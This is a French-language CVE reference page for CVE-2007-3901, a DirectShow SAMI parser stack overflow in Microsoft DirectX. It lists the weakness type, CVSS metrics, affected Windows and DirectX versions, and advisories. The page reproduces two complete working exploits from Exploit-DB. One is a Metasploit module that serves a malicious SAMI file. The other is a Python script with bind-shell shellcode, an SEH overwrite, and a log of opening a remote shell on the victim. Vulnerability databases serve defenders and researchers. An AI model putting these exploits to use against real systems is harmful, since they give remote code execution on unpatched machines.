Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Stack-based buffer overflow in the DirectShow Synchronized Accessible Media Interchange (SAMI) parser in quartz.dll for Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted SAMI file.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16442
Date de publication : 2010-10-04 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: ms07_064_sami.rb 10550 2010-10-05 01:05:49Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft DirectX DirectShow SAMI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the DirectShow Synchronized
Accessible Media Interchanged (SAMI) parser in quartz.dll. This module
has only been tested with Windows Media Player (6.4.09.1129) and
DirectX 8.0.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 10550 $',
'References' =>
[
[ 'CVE', '2007-3901' ],
[ 'OSVDB', '39126' ],
[ 'MSB', 'MS07-064' ],
[ 'BID', '26789' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 Pro SP4 English', { 'Offset' => 22412, 'Ret' => 0x75022ac4 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Dec 11 2007',
'DefaultTarget' => 0))
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
client.get_once
buffer = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded
buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
buffer << make_nops(10) + [0xe8, -485].pack('CV') + rand_text_english(132324)
header = "HTTP/1.1 200 OK\r\n"
header << "Content-Type: application/smil\r\n\r\n"
body = "<SAMI>\r<HEAD>\r<STYLE TYPE=\"text/css\">\r"
body << "<!--\rP {font-size: 1em;\rfont-family: Arial;\r"
body << "font-weight: normal;\rcolor: #FFFFFF;\r"
body << "background: #FFFFFF;\rtext-align: center;\r"
body << "padding-left: 2px;\rpadding-right: 2px;\r"
body << "padding-bottom: 2px;\r}\r.ENUSCC { Name: English; lang: EN-US-CC; }\r"
body << "-->\r</STYLE>\r</HEAD>\r<BODY>\r"
body << "<SYNC Start=\"0\" pippo=\"" + buffer
body << "\"><P Class=\"ENUSCC\"></P></SYNC></BODY></SAMI>"
sploit = header + body
print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")
client.put(sploit)
handler(client)
service.close_client(client)
end
end
Exploit Database EDB-ID : 4866
Date de publication : 2008-01-07 23h00 +00:00
Auteur : ryujin
EDB Vérifié : Yes
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# https://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#
# badrobot:/home/matte# ./mplayer.py
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Documents and Settings\ryujin\Desktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
# Connection-specific DNS Suffix . :
# IP Address. . . . . . . . . . . . : 192.168.1.243
# Subnet Mask . . . . . . . . . . . : 255.255.255.0
# Default Gateway . . . . . . . . . :
#
# C:\Documents and Settings\ryujin\Desktop>
##########################################################################
from socket import *
# SMI BODY
body = """<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P {
font-size: 1em;
font-family: Arial;
font-weight: normal;
color: #FFFFFF;
background: #000000;
text-align: center;
padding-left: 5px;
padding-right: 5px;
padding-bottom: 2px;
}
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
<SYNC Start="0" pippo=\""""
# Metasploit bind shell on port 4444 EXITFUNC seh
shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
)
body += 21988*'A'
body += '\x90'*16 # NOP Slide
body += shellcode + 'C'*67 # to SEH...
body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77' # ShortJmp, and SEH overwrite
body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode
body += 143505*'E' + '">'
body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
# RESPONSE HEADER
header = (
'HTTP/1.1 200 OK\r\n'
'Content-Type: application/smil\r\n'
'\r\n'
)
evilbuf = header + body
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evilbuf)
print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
c.close()
s.close()
# milw0rm.com [2008-01-08]
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version beta3 (Open CPE detail)
Microsoft>>Windows_2003_server >> Version datacenter_edition
Microsoft>>Windows_2003_server >> Version enterprise_edition
Microsoft>>Windows_2003_server >> Version standard
Microsoft>>Windows_2003_server >> Version web_edition
Microsoft>>Windows_vista >> Version *
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Directx >> Version 5.2
- Microsoft>>Directx >> Version 5.2 (Open CPE detail)
Microsoft>>Directx >> Version 6.1
- Microsoft>>Directx >> Version 6.1 (Open CPE detail)
Microsoft>>Directx >> Version 7.0
- Microsoft>>Directx >> Version 7.0 (Open CPE detail)
Microsoft>>Directx >> Version 7.0a
- Microsoft>>Directx >> Version 7.0a (Open CPE detail)
Microsoft>>Directx >> Version 7.1
- Microsoft>>Directx >> Version 7.1 (Open CPE detail)
Microsoft>>Directx >> Version 8.0
- Microsoft>>Directx >> Version 8.0 (Open CPE detail)
Microsoft>>Directx >> Version 8.0a
- Microsoft>>Directx >> Version 8.0a (Open CPE detail)
Microsoft>>Directx >> Version 8.1
- Microsoft>>Directx >> Version 8.1 (Open CPE detail)
Microsoft>>Directx >> Version 8.1a
- Microsoft>>Directx >> Version 8.1a (Open CPE detail)
Microsoft>>Directx >> Version 8.1b
- Microsoft>>Directx >> Version 8.1b (Open CPE detail)
Microsoft>>Directx >> Version 8.2
- Microsoft>>Directx >> Version 8.2 (Open CPE detail)
Microsoft>>Directx >> Version 9.0a
- Microsoft>>Directx >> Version 9.0a (Open CPE detail)
Microsoft>>Directx >> Version 9.0b
- Microsoft>>Directx >> Version 9.0b (Open CPE detail)
Microsoft>>Directx >> Version 9.0c
- Microsoft>>Directx >> Version 9.0c (Open CPE detail)
Microsoft>>Directx >> Version 10.0
- Microsoft>>Directx >> Version 10.0 (Open CPE detail)
Références
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-064
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4520
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=632
Tags : third-party-advisory, x_refsource_IDEFENSE
Tags : third-party-advisory, x_refsource_IDEFENSE
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.